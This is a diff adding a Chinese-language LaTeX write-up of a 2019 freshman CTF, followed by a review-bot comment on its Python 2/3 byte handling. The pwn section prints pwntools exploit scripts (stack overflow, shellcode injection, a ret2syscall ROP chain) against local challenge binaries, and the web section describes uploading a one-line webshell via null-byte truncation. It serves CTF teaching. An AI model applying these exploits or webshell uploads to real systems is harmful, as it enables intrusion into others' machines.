diff --git a/0x3f-writeup/20190331/cugctf-writeup.tex b/0x3f-writeup/20190331/cugctf-writeup.tex
new file mode 100644
index 0000000..38e7426
--- /dev/null
+++ b/0x3f-writeup/20190331/cugctf-writeup.tex
@@ -0,0 +1,216 @@
+% Options for packages loaded elsewhere
+\PassOptionsToPackage{unicode=true}{hyperref}
+\PassOptionsToPackage{hyphens}{url}
+%
+\documentclass[
+]{ctexart}
+\usepackage{lmodern}
+\usepackage{amssymb,amsmath}
+\usepackage{ifxetex,ifluatex}
+\ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex
+ \usepackage[T1]{fontenc}
+ \usepackage[utf8]{inputenc}
+ \usepackage{textcomp} % provides euro and other symbols
+\else % if luatex or xelatex
+ \usepackage{unicode-math}
+ \defaultfontfeatures{Scale=MatchLowercase}
+ \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1}
+\fi
+% Use upquote if available, for straight quotes in verbatim environments
+\IfFileExists{upquote.sty}{\usepackage{upquote}}{}
+\IfFileExists{microtype.sty}{% use microtype if available
+ \usepackage[]{microtype}
+ \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts
+}{}
+\makeatletter
+\@ifundefined{KOMAClassName}{% if non-KOMA class
+ \IfFileExists{parskip.sty}{%
+ \usepackage{parskip}
+ }{% else
+ \setlength{\parindent}{0pt}
+ \setlength{\parskip}{6pt plus 2pt minus 1pt}}
+}{% if KOMA class
+ \KOMAoptions{parskip=half}}
+\makeatother
+\usepackage{xcolor}
+\IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available
+\IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}}
+\hypersetup{
+ pdftitle={0x3f 新生赛 writeup},
+ pdfauthor={TooYoungTooSimp},
+ hidelinks,
+}
+\urlstyle{same} % disable monospaced font for URLs
+\usepackage{color}
+\usepackage{fancyvrb}
+\newcommand{\VerbBar}{|}
+\newcommand{\VERB}{\Verb[commandchars=\\\{\}]}
+\DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}}
+% Add ',fontsize=\small' for more characters per line
+\newenvironment{Shaded}{}{}
+\newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
+\newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}}
+\newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\BuiltInTok}[1]{#1}
+\newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}}
+\newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}}
+\newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
+\newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}}
+\newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}}
+\newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
+\newcommand{\ExtensionTok}[1]{#1}
+\newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}}
+\newcommand{\ImportTok}[1]{#1}
+\newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
+\newcommand{\NormalTok}[1]{#1}
+\newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}}
+\newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}}
+\newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}}
+\newcommand{\RegionMarkerTok}[1]{#1}
+\newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}}
+\newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}}
+\newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\setlength{\emergencystretch}{3em} % prevent overfull lines
+\providecommand{\tightlist}{%
+ \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}}
+\setcounter{secnumdepth}{-\maxdimen} % remove section numbering
+% Redefines (sub)paragraphs to behave more like sections
+\ifx\paragraph\undefined\else
+ \let\oldparagraph\paragraph
+ \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}}
+\fi
+\ifx\subparagraph\undefined\else
+ \let\oldsubparagraph\subparagraph
+ \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}}
+\fi
+
+% Set default figure placement to htbp
+\makeatletter
+\def\fps@figure{htbp}
+\makeatother
+
+
+\title{0x3f 新生赛 writeup}
+\author{TooYoungTooSimp}
+\date{2019/03/31}
+
+\begin{document}
+\maketitle
+
+{
+\setcounter{tocdepth}{3}
+\tableofcontents
+}
+\hypertarget{x3fux65b0ux751fux8d5b-writeup}{%
+\section{0x3f新生赛 Writeup}\label{x3fux65b0ux751fux8d5b-writeup}}
+
+\hypertarget{re}{%
+\subsection{Re}\label{re}}
+
+\hypertarget{r}{%
+\subsubsection{R}\label{r}}
+
+下载可执行文件,用IDA打开,在main函数的最后发现一些mov,将立即数用字符显示即得flag。
+
+\hypertarget{pwn}{%
+\subsection{Pwn}\label{pwn}}
+
+\hypertarget{pwn1}{%
+\subsubsection{pwn1}\label{pwn1}}
+
+简单的栈溢出
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{pld}\OperatorTok{=}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)}
+\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{pwn2}{%
+\subsubsection{pwn2}\label{pwn2}}
+
+通过提示可以找到C++的全局变量初始化函数,发现有mmap一块RWX的内存,而立即数反汇编后是\texttt{jmp\ rsp},栈又可执行,所以题解如下:
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'}
+\NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)}
+\NormalTok{pld }\OperatorTok{=} \StringTok{'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{pwn3}{%
+\subsubsection{pwn3}\label{pwn3}}
+
+没有pie,静态链接,显然是ret2syscall。用ROPgadget找到那些地址直接用就行了。注意当目标地址中含有\texttt{\textbackslash{}x0a}的时候会导致输入截断,因为\texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}。
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4}
+\NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2}
+\NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068}
+\NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a}
+\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)}
+\NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{misc}{%
+\subsection{Misc}\label{misc}}
+
+\hypertarget{cap}{%
+\subsubsection{cap}\label{cap}}
+
+用提示给的网站修复cap,获得修复后的pcap包,跟踪TCP流,发现有两个位置上是lf和ga,将后面一系列包的这两位连起来就是flag了。
+
+\hypertarget{picture}{%
+\subsubsection{picture}\label{picture}}
+
+下载文件,解压后获得图片,用stegsolve打开,发现绿色通道最低位仿佛有信息,导出出来,根据提升修复bmp
+header,打开即见flag。
+
+\hypertarget{ux7b7eux5230}{%
+\subsubsection{签到}\label{ux7b7eux5230}}
+
+复制粘贴,没啥好说的。
+
+\hypertarget{web}{%
+\subsection{Web}\label{web}}
+
+\hypertarget{upload}{%
+\subsubsection{upload}\label{upload}}
+
+任意上传,用burpsuite拦截上传请求,使用0x00进行截断,用这种方法上传一句话木马,然后用中国菜刀类的工具浏览服务器目录,很容易就能发现flag
+
+\hypertarget{section}{%
+\subsubsection{404}\label{section}}
+
+打开开发者工具,发现虽然看起来是404,实际上是200,flag就在http
+headers里面。
+
+\hypertarget{ios88}{%
+\subsubsection{ios88}\label{ios88}}
+
+将user-agent改成ios的,然后把版本号都改成88,就能在http
+headers里找到flag了。
+
+\end{document}
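Review bot: The pwn1 and pwn2 exploit listings concatenate `str` padding with the `bytes` returned by `p64()` and `asm()` (`pld='a'*0x20+'b'*8+p64(0x401182)`), which only works under Python 2 pwntools and raises TypeError on Python 3, so the scripts as printed will not run for most readers today; byte literals fix both, `pld=b'a'*0x20+b'b'*8+p64(0x401182)` and `pld = b'a' * 0x40 + b'b' * 8 + p64(0x666666660000) + asm(shellcraft.sh())` (pwn3 goes through `flat()`, which should cope with the `str` arguments). The hard-coded addresses `0x401182` and `0x666666660000` presumably rely on the binaries being non-PIE and on the RWX `mmap` landing at a fixed address, but the text states the no-PIE assumption only for pwn3; a one-line remark in the pwn1/pwn2 sections that these values are binary-specific and should be re-derived (e.g. with `checksec` and the disassembly) would keep the writeup honest for anyone reusing it. The `\x0a` truncation caveat given under pwn3 is worth stating once for the whole Pwn section, since all three scripts deliver their payload with `sendline` and a newline byte inside any packed address would presumably cut the input short in the same way.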